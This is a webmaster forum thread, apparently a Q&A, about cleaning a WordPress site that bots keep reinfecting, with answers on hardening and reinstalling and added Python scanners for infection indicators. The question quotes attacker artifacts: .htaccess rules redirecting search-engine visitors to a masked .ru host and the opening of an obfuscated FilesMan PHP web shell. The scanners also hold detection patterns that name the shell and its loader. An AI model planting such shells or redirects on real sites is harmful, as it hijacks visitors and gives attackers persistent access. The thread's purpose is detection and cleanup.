@Goswami781

Clean an attacked website

Posted in: #Botattack

For a few months, a client's website has been attacked by bots. I've changed the website source (now the latest WordPress version) and tried to clean it, but the bot finds a hole in security...

After the bot's actions I can find .htaccess files on the website with this inside:

ErrorDocument 400 **********.ru/upday/index.php
ErrorDocument 401 **********.ru/upday/index.php
[...]

RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|
altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|
metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|
rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch
|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search
|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick
|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey
|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro
|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase
|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv).(.*)

RewriteRule ^(.*)$ *******.ru/upday/index.php [R=301,L]

[...]


I can find in my log files the file used to add the .htaccess:

77.84.28.xxx domain.tdl - [23/Feb/2012:00:00:00 +0100] "POST /fichiers/cookiemw5.php HTTP/1.1" 200 34 "-" "-"


With this code inside:

<?php $auth_pass="";$color="#df5";$default_action="FilesMan";$default_use_ajax=true;
$default_charset="Windows-1251";preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A
\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64
[...]


I delete the .php files and the .htaccess files, but they reappear after hours or minutes...
What is the procedure to find the hole / stop the bot attack?

(It's on shared hosting at ovh.com.)

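A triage scan for the indicators in this post (the hex-escaped eval(gzinflate(base64_decode( loader, preg_replace with the /e modifier, the FilesMan shell, .htaccess redirects to an off-site host, and PHP under wp-content/uploads), added here as an example and not code from the poster. The file tree it scans is constructed to mimic the post; the indicator names and the bad.example host are this example's own.

```python
import re, tempfile
from pathlib import Path
# Indicators modelled on the question's samples; names are this example's own.
PHP_RX = {
    "preg_replace_e": re.compile(r"preg_replace\s*\(\s*['\"]/.*?/[a-z]*e[a-z]*['\"]", re.S),
    "hex_escaped_run": re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}"),  # \x65\x76\x61\x6C = eval
    "filesman_shell": re.compile(r"\$default_action\s*=\s*['\"]FilesMan['\"]"),
}
HTACCESS_RX = {  # targets that are neither local paths nor quoted text point off-site
    "errordoc_external": re.compile(r"^\s*ErrorDocument\s+\d{3}\s+(?![/\"'])\S+", re.M),
    "referer_redirect": re.compile(
        r"RewriteCond\s+%\{HTTP_REFERER\}.*?RewriteRule\s+\S+\s+(?![/\"'])\S+\s+\[[^\]]*R=30[12]", re.S),
}

def scan_file(path, root):
    rel = path.relative_to(root).as_posix()
    data = path.read_text(encoding="utf-8", errors="replace")
    name, hits = path.name.lower(), []
    if name == ".htaccess":
        hits = [k for k, rx in HTACCESS_RX.items() if rx.search(data)]
    elif name.endswith((".php", ".phtml", ".php5")):
        hits = [k for k, rx in PHP_RX.items() if rx.search(data)]
        if rel.startswith("wp-content/uploads/"):  # uploads should never hold PHP
            hits.append("php_in_uploads")
    return rel, hits

def scan_tree(root):
    found = (scan_file(p, root) for p in Path(root).rglob("*") if p.is_file())
    return {rel: hits for rel, hits in found if hits}

def demo_findings():
    # Constructed sample tree mimicking the question's files (not the real ones).
    samples = {
        "fichiers/cookiemw5.php": '<?php $auth_pass="";$default_action="FilesMan";preg_replace("/.*/e",'
            '"\\x65\\x76\\x61\\x6C\\x28\\x67\\x7A\\x69\\x6E\\x66\\x6C\\x61\\x74\\x65\\x28(\'...\')");',
        ".htaccess": "ErrorDocument 400 http://bad.example/upday/index.php\nRewriteCond %{HTTP_REFERER} "
            "^.*(google|bing|yahoo).(.*)\nRewriteRule ^(.*)$ http://bad.example/upday/index.php [R=301,L]\n",
        "wp-content/uploads/2012/02/thumb.php": "<?php echo 'x';",
        "wp-includes/functions.php": "<?php function wp_ok() { return 1; }",
    }
    with tempfile.TemporaryDirectory() as tmp:
        for rel, body in samples.items():
            p = Path(tmp, rel)
            p.parent.mkdir(parents=True, exist_ok=True)
            p.write_text(body, encoding="utf-8")
        return scan_tree(tmp)

if __name__ == "__main__":
    for path, hits in sorted(demo_findings().items()):
        print(f"{path}: {', '.join(hits)}")
```

Run it against the real docroot with scan_tree("/path/to/site") and compare every flagged file against a clean copy of the same WordPress release before deleting anything.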

2 Comments


@Turnbaugh106

Basic Security Steps


Since WordPress is so popular there are a lot of drive-by hacks knocking around taking advantage of flaws in basic security. All WordPress users should take the following basic and easy steps to protect themselves:


Do not use wp_ as the database table prefix; use any string of random characters that appeals.
Turn off WordPress DB errors.
Make sure your directories are set to chmod 755 and files to 644.
Use a secure password generator (use at least 15 characters).
Do not use admin as a username.
Place a blank .htaccess file in the wp-admin directory.
Read the WordPress hardening guide.
Check the Google Cache of your site for hidden malware.
Remove <meta name="generator" content="WordPress X.X.X" /> from your site's header by placing remove_action('wp_head', 'wp_generator'); in your functions.php file (drive-by attackers will not have an easy way to find which version they are targeting).



TimThumb Hack


There is also a very popular drive-by hack associated with an old version of the popular TimThumb script, which causes a lot of problems for webmasters. Check your uploads directory for PHP files and ensure you've upgraded to the latest version of the script to avoid this.


Advice


I run about 10 different WordPress sites and have found the WP-Security plugin and an account from Website Defender invaluable: it scans your site regularly and reports on security errors, malware, and even page errors via email, so you can be assured that you know when something goes wrong.

WP-Firewall is also very useful for defense against 0-Day exploits and VirusTotal is handy if you suspect an infection.

Akismet and Disqus.com are useful tools for defending against comment spam, and you should read the Webmaster Pros community wiki on this subject.


Webmaster Tools


You should also sign up to Webmaster Tools, but if you suspect an infection, take all steps to find and clean it up first or you may end up with Google warning your users that yours is a reported attack site.

If it detects an infection, Google will send an email to all of the following addresses: abuse@, admin@, administrator@, contact@, info@, postmaster@, support@, webmaster@, so you should ensure that you have at least one of these in place and monitored.


Paid Removal Services / Where To Get Help


There are also a number of sites which offer paid malware removal services; I would be very suspicious of these, as many appear to be scams of one sort or another.

There is plenty of high-quality help and support available for free in the WordPress forums, here on Webmaster Pros, on the WordPress Stack Exchange site and on Stack Overflow. Don't pay for things you can fix on your own.

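An offline audit for the points in this answer that are visible on disk (the wp_ table prefix, the blank wp-admin/.htaccess, the wp_generator removal in functions.php, and 755/644 modes), added here as an example and not the answerer's code. The install it checks is a constructed temporary tree with three points deliberately wrong and one file mode deliberately loosened.

```python
import re, stat, tempfile
from pathlib import Path

DIR_MODE, FILE_MODE = 0o755, 0o644  # the answer's recommended modes
GEN_RX = re.compile(r"remove_action\s*\(\s*['\"]wp_head['\"]\s*,\s*['\"]wp_generator['\"]")
PREFIX_RX = re.compile(r"\$table_prefix\s*=\s*['\"]([^'\"]*)['\"]")

def audit_wp(root):
    # Returns (check, detail) tuples for the hardening points that are visible on disk.
    root, findings = Path(root), []
    cfg = (root / "wp-config.php").read_text(encoding="utf-8", errors="replace")
    m = PREFIX_RX.search(cfg)
    if not m or m.group(1) == "wp_":
        findings.append(("table_prefix", "wp-config.php uses the default wp_ prefix"))
    if not (root / "wp-admin" / ".htaccess").is_file():
        findings.append(("wp_admin_htaccess", "wp-admin/.htaccess is missing"))
    for fn in root.glob("wp-content/themes/*/functions.php"):
        if not GEN_RX.search(fn.read_text(encoding="utf-8", errors="replace")):
            findings.append(("generator_meta", f"{fn.relative_to(root).as_posix()} keeps wp_generator"))
    for p in root.rglob("*"):
        want = DIR_MODE if p.is_dir() else FILE_MODE
        have = stat.S_IMODE(p.stat().st_mode)
        if have != want:
            findings.append(("permissions", f"{p.relative_to(root).as_posix()} is {have:o}, want {want:o}"))
    return findings

def demo_audit():
    # Constructed install with three of the answer's points wrong (not a real site).
    files = {
        "wp-config.php": "<?php $table_prefix = 'wp_';",
        "wp-content/themes/demo/functions.php": "<?php // no remove_action() here",
        "wp-content/uploads/photo.jpg": "",
        "wp-admin/index.php": "<?php",
    }
    with tempfile.TemporaryDirectory() as tmp:
        for rel, body in files.items():
            p = Path(tmp, rel)
            p.parent.mkdir(parents=True, exist_ok=True)
            p.write_text(body, encoding="utf-8")
        for p in Path(tmp).rglob("*"):           # normalise modes, then loosen one file
            p.chmod(DIR_MODE if p.is_dir() else FILE_MODE)
        Path(tmp, "wp-content/uploads/photo.jpg").chmod(0o666)
        return audit_wp(tmp)

if __name__ == "__main__":
    for check, detail in demo_audit():
        print(f"[{check}] {detail}")
```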

@Kevin317

You need to completely remove every file from your website and do a fresh install of WordPress. The odds are they uploaded files that allow them continuous access to your site. Unless you want to go file by file trying to figure out which one(s) they are, a complete install from scratch is the best thing you can do.
